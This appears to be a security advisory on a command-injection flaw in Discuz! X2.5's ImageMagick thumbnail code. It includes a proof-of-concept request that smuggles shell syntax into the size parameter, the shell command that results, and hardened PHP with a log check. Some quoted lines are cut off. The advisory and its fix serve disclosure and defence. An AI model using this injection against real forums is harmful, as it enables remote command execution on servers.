<ul><li>/source/module/aforum/forum_image.php</li></ul>
```php
$nocache = !empty($_GET['nocache']) ? 1 : 0;
$daid = intval($_GET['aid']);
$type = !empty($_GET['type']) ? $_GET['type'] : 'fixwr';
list($w, $h) = explode('x', $_GET['size']);   // $w and $h are the raw request strings
$dw = intval($w);                              // only these two copies are cast to int
$dh = intval($h);
$thumbfile = 'image/'.$daid.'_'.$dw.'_'.$dh.'.jpg';
$parse = parse_url($_G['setting']['attachurl']);
$attachurl = !isset($parse['host']) ? $_G['siteurl'].$_G['setting']['attachurl'] : $_G['setting']['attachurl'];
if(!$nocache) {
    // an already generated thumbnail short-circuits the request; nocache skips this
    if(file_exists($_G['setting']['attachdir'].$thumbfile)) {
        dheader('location: '.$attachurl.$thumbfile);
    }
}

define('NOROBOT', TRUE);

$id = !empty($_GET['atid']) ? $_GET['atid'] : $daid;
// the signature covers the int-cast $dw/$dh, not the raw $w/$h
if(dsign($id.'|'.$dw.'|'.$dh) != $_GET['key']) {
    dheader('location: '.$_G['siteurl'].'static/image/common/none.gif');
}

if($attach = C::t('forum_attachment_n')->fetch('aid:'.$daid, $daid, array(1, -1))) {
    if(!$dw && !$dh && $attach['tid'] != $id) {
        dheader('location: '.$_G['siteurl'].'static/image/common/none.gif');
    }
    dheader('Expires: '.gmdate('D, d M Y H:i:s', TIMESTAMP +   ).' GMT');
    if($attach['remote']) {
        $filename = $_G['setting']['ftp']['attachurl'].'forum/'.$attach['attachment'];
    } else {
        $filename = $_G['setting']['attachdir'].'forum/'.$attach['attachment'];
    }
    require_once libfile('class/image');
    $img = new image;
    if($img->Thumb($filename, $thumbfile, $w, $h, $type)) {   // raw $w/$h are passed here
```
The values handed to the Thumb method are $w and $h, taken straight from explode() on $_GET['size'], not the intval()-filtered $dw and $dh. Note that the request signature is computed over $id|$dw|$dh, i.e. over the cast values, so a key that is valid for a 300x300 thumbnail is equally valid when the size parameter carries extra shell syntax after the digits, and nocache bypasses the early redirect to an already cached thumbnail.
- /source/class/class_image.php
```php
function Thumb($source, $target, $thumbwidth, $thumbheight, $thumbtype = 1, $nosuffix = 0) {
    $return = $this->init('thumb', $source, $target, $nosuffix);
    if($return <= 0) {
        return $this->returncode($return);
    }

    if($this->imginfo['animated']) {
        return $this->returncode(0);
    }
    $this->param['thumbwidth'] = $thumbwidth;      // stored unchanged
    if(!$thumbheight || $thumbheight > $this->imginfo['height']) {
        $thumbheight = $thumbwidth > $this->imginfo['width'] ? $this->imginfo['height'] : $this->imginfo['height
    }
    $this->param['thumbheight'] = $thumbheight;    // stored unchanged
    $this->param['thumbtype'] = $thumbtype;
    if($thumbwidth < 100 && $thumbheight < 100) {
        $this->param['thumbquality'] = 100;
    }

    $return = !$this->libmethod ? $this->Thumb_GD() : $this->Thumb_IM();   // ImageMagick path when libmethod is set
```
The parameters are still unfiltered when they are stored into $this->param (thumbwidth/thumbheight), and from there they reach the Thumb_IM method, which is the code path taken when the forum is configured to use ImageMagick ($this->libmethod set) rather than GD.
```php
function Thumb_IM() {
    switch($this->param['thumbtype']) {
        case 'fixnone':
        case 1:
            if($this->imginfo['width'] > $this->param['thumbwidth'] || $this->imginfo['height'] > $this->param['
                // thumbwidth/thumbheight are concatenated into the shell command line unquoted
                $exec_str = $this->param['imageimpath'].'/convert -quality '.intval($this->param['thumbquality']
                $return = exec($exec_str);
                if(!file_exists($this->target)) {
                    return -3;
                }
            }
            break;
```
<p>The parameters are concatenated into the string handed to exec(), which runs it through the system shell, resulting in arbitrary command execution. Only the ImageMagick branch (Thumb_IM) is affected; the PoC sets type=fixnone to land in that case, nocache=yes to skip the redirect to an already cached thumbnail, and a key that is valid for a 300x300 thumbnail, which still matches because dsign() is computed over the int-cast $dw and $dh.</p><p>When a user sends:</p><pre class="">mod=image&aid=71&size=300x300||echo%20aaa>1.TXT%20%23&key=222dfc26b07dcd6a&nocache=yes&type=fixnone</pre><p>the command executed is:</p><pre class="">/bin/convert -quality 100 -geometry 300x300||echo aaa>1.TXT # /var/www/html/discuzx2.5/upload/./data/attachment/forum/201501/16/143552dnewxwoxwsooezea.jpg /var/www/html/discuzx2.5/upload/./data/attachment/./image/71_300_300.jpg</pre><p>convert is invoked with no input file and exits non-zero, so the shell runs the echo after ||, while the trailing # comments out the real source and target paths. Web root directory afterwards:</p><p><img alt="67F3866B-4271-4B5C-A928-171494D73DFA.png" src="https://images.seebug.org/@/uploads/1433907619885-67F3866B-4271-4B5C-A928-171494D73DFA.png" data-image-size="490,125"><br></p>
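As an added illustration (not Discuz! code), the PHP below shows the same command construction in vulnerable and hardened form, together with a request-side check that can be run over query strings from access logs. Function names, paths and the sample request are constructed for this example; the payload mirrors the PoC above.

```php
<?php
// Added example, not Discuz! code: the command construction from forum_image.php /
// Thumb_IM() in vulnerable and hardened form, plus a request-side check.
// All function names, paths and the sample request below are constructed.

// Vulnerable shape: the raw size string is split and concatenated into the
// command line exactly as the excerpt above does with $w/$h.
function build_convert_cmd_vulnerable(string $size, string $source, string $target, int $quality = 100): string
{
    $parts = explode('x', $size, 2);
    $w = $parts[0];
    $h = $parts[1] ?? '';
    return '/usr/bin/convert -quality '.intval($quality)
         .' -geometry '.$w.'x'.$h.' '.$source.' '.$target;
}

// Hardened shape: accept only <digits>x<digits>, cast, and quote every operand
// with escapeshellarg(). Returns null on reject; the caller should serve
// none.gif rather than try to "clean" the input.
function build_convert_cmd_safe(string $size, string $source, string $target, int $quality = 100): ?string
{
    if (!preg_match('/^(\d{1,5})x(\d{1,5})$/', $size, $m)) {
        return null;
    }
    $w = (int) $m[1];
    $h = (int) $m[2];
    if ($w < 1 || $h < 1) {
        return null;
    }
    return '/usr/bin/convert -quality '.intval($quality)
         .' -geometry '.escapeshellarg($w.'x'.$h)
         .' '.escapeshellarg($source)
         .' '.escapeshellarg($target);
}

// Log/WAF check: for this endpoint a size value that is not <digits>x<digits>
// is never legitimate, so flag it regardless of which metacharacter was used.
function size_param_is_suspicious(string $queryString): bool
{
    parse_str($queryString, $params);
    if (!isset($params['size'])) {
        return false;
    }
    return !is_string($params['size']) || !preg_match('/^\d{1,5}x\d{1,5}$/', $params['size']);
}

// Constructed inputs mirroring the PoC above (paths are hypothetical).
$payload = '300x300||echo aaa>1.TXT #';
$src = '/var/www/upload/data/attachment/forum/201501/16/example.jpg';
$dst = '/var/www/upload/data/attachment/image/71_300_300.jpg';

echo "vulnerable: ", build_convert_cmd_vulnerable($payload, $src, $dst), "\n";
echo "hardened:   ", var_export(build_convert_cmd_safe($payload, $src, $dst), true), "\n";
echo "hardened:   ", build_convert_cmd_safe('300x300', $src, $dst), "\n";
echo "suspicious: ", var_export(size_param_is_suspicious(
    'mod=image&aid=71&size=300x300%7C%7Cecho%20aaa%3E1.TXT%20%23&nocache=yes&type=fixnone'
), true), "\n";
```

The hardened builder rejects rather than sanitizes. intval() would silently have turned "300||echo aaa>1.TXT #" into 300, and that is exactly what forum_image.php did for $dw/$dh before passing the uncast originals on, so the fix in the real code is to pass only the cast values to Thumb() and additionally quote them with escapeshellarg() where Thumb_IM() builds the command line.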